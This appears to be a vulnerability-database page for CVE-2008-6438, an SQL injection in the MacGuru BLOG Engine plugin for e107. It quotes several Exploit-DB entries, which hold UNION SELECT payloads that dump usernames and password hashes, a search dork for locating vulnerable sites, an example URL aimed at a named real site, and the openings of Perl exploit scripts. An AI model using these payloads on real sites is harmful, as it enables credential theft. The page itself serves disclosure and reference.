CVE-2008-6438
published 2009-03-06CVE-2008-6438: SQL injection vulnerability in macgurublog_menu/macgurublog.php in the MacGuru BLOG Engine plugin 2.2 for e107 allows remote attackers to execute arbitrary SQL…
PriorityP345high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
3.40%
87.3th percentile
SQL injection vulnerability in macgurublog_menu/macgurublog.php in the MacGuru BLOG Engine plugin 2.2 for e107 allows remote attackers to execute arbitrary SQL commands via the uid parameter, a different vector than CVE-2008-2455. NOTE: it was later reported that 2.1.4 is also affected.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| e107coders | macguru_blog_engine_plugin | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
e107 Plugin BLOG Engine 2.1.4 - SQL Injection
exploitdb·2008-10-28
CVE-2008-6438 e107 Plugin BLOG Engine 2.1.4 - SQL Injection
e107 Plugin BLOG Engine 2.1.4 - SQL Injection
---
e107 Plugin macgurublog_menu macgurublog.php (uid) Remote Sql inj
author: ZoRLu
home: z0rlu.blogspot.com
concat: [email protected]
date: 28/10/2008
n0te: YALNIZLIK YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
n0te: a.q kpss : ) )
dork: allinurl:"macgurublog.php?uid="
exploit:
http://localhost/script_path/macgurublog.php?uid=[SQL]
[SQL]=
-1+union+select+concat(user_name,char(58),user_password,char(58)),2+from+e107_user/*
example:
http://www.dmchat.org.uk/e107_plugins/macgurublog_menu/macgurublog.php?uid=-1+union+select+concat(user_name,char(58),user_password,char(58)),2+from+e107_user/*
thanks: str0ke
# milw0rm.com [2008-10-28]
Exploit-DB
e107 Plugin BLOG Engine 2.2 - 'uid' SQL Injection
exploitdb·2008-09-01
CVE-2008-6438 e107 Plugin BLOG Engine 2.2 - 'uid' SQL Injection
e107 Plugin BLOG Engine 2.2 - 'uid' SQL Injection
---
#!/usr/bin/perl
##############################################################
# e107 Plugin BLOG Engine v2.2 SQL Injection Exploit #
# ..::virangar security team::.. #
# www.virangar.net #
# C0d3d BY:virangar security team ( hadihadi ) #
#special tnx to: #
#MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra #
#& all virangar members & all hackerz #
# my lovely friends hadi_aryaie2004 & arash(imm02tal) #
# ..:::Young Iranina Hackerz::.. #
##############################################################
use HTTP::Request;
use LWP::UserAgent;
if (@ARGV != 1){
header();
}
$site = $ARGV[0];
$attack= "$site"."?uid=-99999%20union%20select%201,concat(0x3c757365723e,user_name,0x3c757365723e,user_password),3%20from%20e107_user%20where%20user_
id
Exploit-DB
e107 Plugin BLOG Engine 2.2 - Blind SQL Injection
exploitdb·2008-07-29
CVE-2008-6438 e107 Plugin BLOG Engine 2.2 - Blind SQL Injection
e107 Plugin BLOG Engine 2.2 - Blind SQL Injection
---
#!/usr/bin/perl
#####################################################################################
# e107 Plugin BLOG Engine v2.2 Blind SQL Injection Exploit #
# ..::virangar security team::.. #
# www.virangar.net #
# C0d3d BY:virangar security team ( hadihadi ) #
#special tnx to: #
#MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra #
#& all virangar members & all hackerz #
# my lovely friends hadi_aryaie2004 & arash(imm02tal) #
# ..:::Young Iranina Hackerz::.. #
#####################################################################################
#[-] note: becuse e107 using diffrent prefix/table names may it's not work good,but i wrote it for default mod ;)
#this code is for english e107's only,if you want work on other languages,yo
Exploit-DB
e107 Plugin BLOG Engine 2.2 - 'uid' Blind SQL Injection
exploitdb·2008-05-22
CVE-2008-6438 e107 Plugin BLOG Engine 2.2 - 'uid' Blind SQL Injection
e107 Plugin BLOG Engine 2.2 - 'uid' Blind SQL Injection
---
##################################################################################################
# #
# ::e107 Plugin BLOG Engine v2.2 (macgurublog.php/uid) Blind SQL Injection Vulnerability:: #
# #
##################################################################################################
Virangar Security Team
www.virangar.net
Discoverd By :virangar security team(hadihadi)
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
& all virangar members & all hackerz
greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal)
-------vuln codes in:-----------
macgurublog.php:
line 18:$buid = $_GET['uid'];
..
..
line 31:$sql -> db_Select("user", "user_name", "user_id=".$buid);
---
exploit:
http://osvdb.org/51408http://secunia.com/advisories/30212http://www.securityfocus.com/archive/1/492506/100/0/threadedhttp://www.securityfocus.com/bid/29344http://www.vupen.com/english/advisories/2008/2468https://exchange.xforce.ibmcloud.com/vulnerabilities/42715https://www.exploit-db.com/exploits/5666https://www.exploit-db.com/exploits/6346https://www.exploit-db.com/exploits/6856http://osvdb.org/51408http://secunia.com/advisories/30212http://www.securityfocus.com/archive/1/492506/100/0/threadedhttp://www.securityfocus.com/bid/29344http://www.vupen.com/english/advisories/2008/2468https://exchange.xforce.ibmcloud.com/vulnerabilities/42715https://www.exploit-db.com/exploits/5666https://www.exploit-db.com/exploits/6346https://www.exploit-db.com/exploits/6856
2009-03-06
Published